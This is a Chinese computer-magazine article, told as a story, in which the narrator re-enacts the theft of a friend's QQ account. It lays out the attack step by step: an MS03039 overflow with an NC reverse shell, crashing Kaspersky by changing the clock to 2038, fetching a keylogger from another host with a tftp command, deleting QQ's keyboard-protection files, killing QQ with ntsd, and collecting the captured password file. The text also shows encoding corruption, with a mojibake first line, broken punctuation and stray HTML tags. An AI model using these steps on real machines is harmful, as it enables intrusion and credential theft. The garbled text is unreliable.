ＳＥＡＰＩＧ?。蹋椋欤拢幔猓?/p>

猖狂的盜號(hào)者

“阿Q，你的QQ被盜了?！蔽移届o地通知阿Q。

“你就忽悠我吧，大哥。”

“真的，不信你看：本號(hào)被盜，要想找回此號(hào)……”（圖1）

正在打CS的阿Q，一骨碌就從桌子對(duì)面翻了過(guò)來(lái)：“不是吧，我裝的可是卡巴斯基啊?！?/p>

怎么辦？趕緊到http://service.qq.com/申訴，還好他記性比較好，填了申訴表里的一大堆問(wèn)題，但是要三天之后才有答復(fù)。

當(dāng)初是我推薦阿Q裝卡巴斯基的，這下QQ號(hào)被盜了，我也挺過(guò)意不去。讓他仔細(xì)回憶一下被盜經(jīng)過(guò)，阿Q說(shuō)曾經(jīng)碰到一次QQ突然關(guān)了，以為程序出錯(cuò)所以再次登錄，接著卡巴斯基也崩潰了。

找找被盜的原因

由此看來(lái)，遭遇盜號(hào)木馬了。可令人不解的是，卡巴斯基怎么崩潰了呢？眾所周知，卡巴斯基的進(jìn)程保護(hù)相當(dāng)強(qiáng)大，除了“冰刃”能“殺”掉其進(jìn)程，無(wú)論是WinXP自帶的NTSD還是大名鼎鼎的PSkill都奈何不了。留下的惟一線索就是系統(tǒng)時(shí)間被改成了2038年，也就是這一改動(dòng)讓卡巴斯基放水了。

說(shuō)裝了卡巴斯基，病毒木馬入侵的幾率比較小，那么系統(tǒng)漏洞的威脅就比較大了。用X-Scan一掃，MS03026、MS03039、MS03049、MS04011等高危溢出漏洞一大堆，慘不忍睹。

“你哪年裝的系統(tǒng)??？那么多重要的補(bǔ)丁都沒(méi)打，想必這就是盜號(hào)者下手的地方了?！?/p>

“怎么下手？不凡你給我演示下，我要搞清楚，免得下次再中招。”

模擬第一現(xiàn)場(chǎng)

因?yàn)橐呀?jīng)知道了阿Q的電腦上有很多漏洞沒(méi)打補(bǔ)丁，我在自己的電腦上使用MS03039溢出工具，再加上NC反向連接，很輕松就獲取了CMD Shell（圖1）。具體方法請(qǐng)參考《激情溢出三部曲》（本刊今年2月上旬刊），在此不再贅述。

在獲取C M D S h e l l 后， 用“tasklist”查看進(jìn)程獲知裝有卡巴斯基。面對(duì)虎視眈眈的卡巴斯基，要想上傳盜號(hào)工具難于上青天，關(guān)鍵在于卡巴斯基的相關(guān)進(jìn)程沒(méi)法終止?？勺罱ò退够隽?038漏洞，只要修改一下時(shí)間，卡巴斯基就崩潰了，這就給了盜號(hào)者可乘之機(jī)（以下乃模擬盜號(hào)情景，切勿模仿）。

我又從硬盤里找出兩個(gè)工具，《窗口鍵盤記錄器》和TFTP32，前者用于捕捉鍵盤記錄，用后者把它送到阿Q的電腦里去。

將《窗口鍵盤記錄器》主程序keylog放至TFTP32所在目錄，運(yùn)行TFTP32開(kāi)啟FTP服務(wù)（圖3）。圖標(biāo)還在，給人還在運(yùn)行的假象。

QQ2005 Beta3之后的版本對(duì)鍵盤輸入采取了保護(hù)措施，使得鍵盤記錄程序無(wú)法捕獲輸入字符。將QQ安裝目錄下的npkcrypt.vxd、npkcrypt.sys、npkcusb.sys三個(gè)文件刪除后，鍵盤保護(hù)就失效了。再刪除LoginUinList.dat，這樣可以清除QQ記錄的號(hào)碼，在登錄時(shí)要重新輸入。

利用“tftp –i 192.168.1.9 GET keylog.e x e”命令將鍵盤記錄程序上傳至目標(biāo)主機(jī)并運(yùn)行。用tasklist命令獲取QQ進(jìn)程的P I D，再用“ntsd -c q -p PID”結(jié)束Q Q 進(jìn)程。5分鐘之后，將C : WindowsSystem32目錄下的11111.txt拷貝過(guò)來(lái)，里面就有QQ賬號(hào)和密碼（圖6）。

“這，這就被偷走了?。俊?阿Q目瞪口呆。

“對(duì)付不設(shè)防的電腦，那還不是輕而易舉。快回去重裝系統(tǒng)并打補(bǔ)丁吧?！?/p>

本文中所涉及到的圖表、注解、公式等內(nèi)容請(qǐng)以PDF格式閱讀原文。